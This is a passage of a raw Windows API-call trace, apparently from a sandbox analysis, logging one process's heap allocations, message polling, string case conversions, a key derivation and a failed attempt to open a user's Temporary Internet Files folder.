dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0251.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0251.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0251.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0251.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0251.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0251.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0251.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0251.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0251.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0251.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0251.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0251.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0251.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0251.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0251.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0251.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0251.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0251.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0251.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0251.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0251.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0251.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0251.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0251.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0251.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0251.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0251.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0251.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0251.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0251.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0251.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0251.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0251.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0251.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0251.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0251.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0251.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0251.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0251.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0251.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0251.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0251.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0251.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0251.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0251.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0251.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0251.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0251.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0251.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0251.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0251.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0251.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0251.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0251.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0251.287] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0251.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0251.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0251.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0251.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0251.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0251.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0251.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0251.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0251.288] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.288] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0251.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0251.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0251.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0251.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0251.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0251.288] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0251.288] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0251.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0251.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0251.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0251.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0251.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0251.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0251.289] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0251.289] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0251.289] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0251.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0251.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0251.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0251.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0251.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0251.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0251.289] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0251.289] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0251.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0251.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0251.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0251.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0251.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0251.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0251.289] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0251.289] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0251.290] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0251.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0251.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0251.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0251.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0251.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0251.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0251.290] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0251.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0251.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0251.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0251.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0251.290] CryptDeriveKey (in: hProv=0xad2c70, Algid=0x6601, hBaseData=0xaa5920, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa5820) returned 1 [0251.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0060 [0251.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0251.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0251.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0251.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0251.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0251.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0251.291] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0251.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0251.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0251.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0251.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0251.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0251.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0251.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0251.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0251.291] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.291] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0251.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0251.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0251.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0251.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0251.291] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0251.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0251.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0251.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0251.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0251.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0251.292] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0251.292] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0251.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0251.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0251.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0251.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0251.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0251.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0251.292] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0251.292] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0251.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0251.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0251.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0251.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0251.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0251.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0251.293] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0251.293] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0251.293] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0251.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0251.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0251.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0251.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0251.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0251.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0251.293] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0251.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0251.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0251.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0251.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0251.293] CryptDestroyHash (hHash=0xaa5920) returned 1 [0251.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0060 [0251.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0251.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0251.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0251.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0251.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0251.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0251.294] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0251.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0251.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0251.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0251.294] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0251.294] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.294] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.294] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0251.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0251.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0251.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0251.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0251.294] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Local/Temporary Internet Files" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temporary internet files"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.295] GetLastError () returned 0x5 [0251.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0251.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0251.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3551008 | out: hHeap=0x25c0000) returned 1 [0251.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0251.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0251.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0251.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0251.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0251.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0251.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0251.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0251.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0251.295] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0251.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0251.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0251.296] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0251.296] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0251.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0251.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0251.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0251.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0251.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0251.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0251.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0251.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0251.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 